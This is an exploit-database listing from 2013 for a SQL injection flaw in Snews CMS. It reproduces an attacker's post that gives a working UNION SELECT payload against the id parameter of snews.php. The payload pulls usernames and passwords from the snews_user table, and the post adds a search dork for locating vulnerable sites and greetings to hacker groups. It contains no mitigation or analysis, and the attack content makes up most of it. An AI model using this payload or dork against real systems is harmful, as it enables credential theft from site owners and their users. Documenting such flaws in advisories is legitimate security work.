Snews CMS SQL Injection

2013.01.16
Credit: onestree
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

____ ____ ____ _______/ |________ ____ ____ / _ \ / \_/ __ \ / ___/\ __\_ __ \_/ __ \_/ __ \ ( <_> ) | \ ___/ \___ \ | | | | \/\ ___/\ ___/ \____/|___| /\___ >____ > |_ | |__| \___ >\___ > \/ \/ \/ \/ \/ # Exploit Title : CMS snews SQL Injection Vulnerability # Author : By onestree # Software Link : http://snewscms.com/ # tested : ubuntu 12.10 / win 7 # Dork : inurl:"tanyakan pada rumput yang bergoyang" ************************************************************* SQL poc: http://localhost/snews/snews.php?act=shownews&id=[SQL] Example: http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* Thanks : Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell indonesiancoder - moeslimh4x0r - go-coder spesial my hunny :*

References:

http://snewscms.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top